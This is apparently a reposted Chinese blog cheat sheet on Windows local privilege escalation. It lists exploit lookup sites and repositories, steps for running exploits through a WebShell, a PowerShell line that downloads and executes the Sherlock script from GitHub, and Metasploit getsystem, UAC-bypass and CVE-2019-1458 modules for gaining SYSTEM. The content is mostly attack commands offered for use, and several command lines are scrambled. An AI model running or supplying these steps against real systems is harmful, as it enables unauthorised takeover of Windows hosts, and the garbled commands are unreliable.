1.可利用漏洞信息收集
收集本机systeminfo中补丁信息
在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp
然后查询exp,选择对应的Exp下载运行即可。
https://i.hacking8.com/
https://github.com/SecWiki/windows-kernel-exploits
提权Exp的运行方式,一般有以下几种:
直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system
在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令
利用MSF等工具
C++源码,Python脚本,PowerShell脚本等特殊方式
2.WinSystemHelper
使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测
https://github.com/brianwrf/WinSystemHelper
上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果
然后在可利用的Exp中任意下载一个并执行即可
3.Sherlock
Sherlock是在Windows下用于本地提权的PowerShell脚本
分析漏洞出漏洞后利用对应Exp即可
启动Powershell
exec bypass powershell.exe -
# 本地加载脚本
Import-Module Sherlock.ps1
# 远程加载脚本
'https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1') IEX (New-Object System.Net.Webclient).DownloadString(
# 检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞
Find-AllVulns
|
4.msf中的提权方法 |
getsystem
meterpreter> getsystem
BypassUAC
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
# 后台session background
local/bypassuac use exploit/windows/
set SESSION <session_id>
后台session时会返回session_id,如不清楚可以使用命令sessions -l
run
内核提权
查询补丁
run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010
# 查询Exp
use post/multi/recon/local_exploit_suggester
set LHOST <攻击机IP>
set SESSION <session_id>
run
# 利用示例
local/cve_2019_1458_wizardopium use exploit/windows/
set SESSION <session_id>
run
getuid
Server username: NT AUTHORITYSYSTEM
作者及来源:Leticia's Blog
本文始发于微信公众号(乌雲安全):干货|windows提权速查流程 收藏备用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论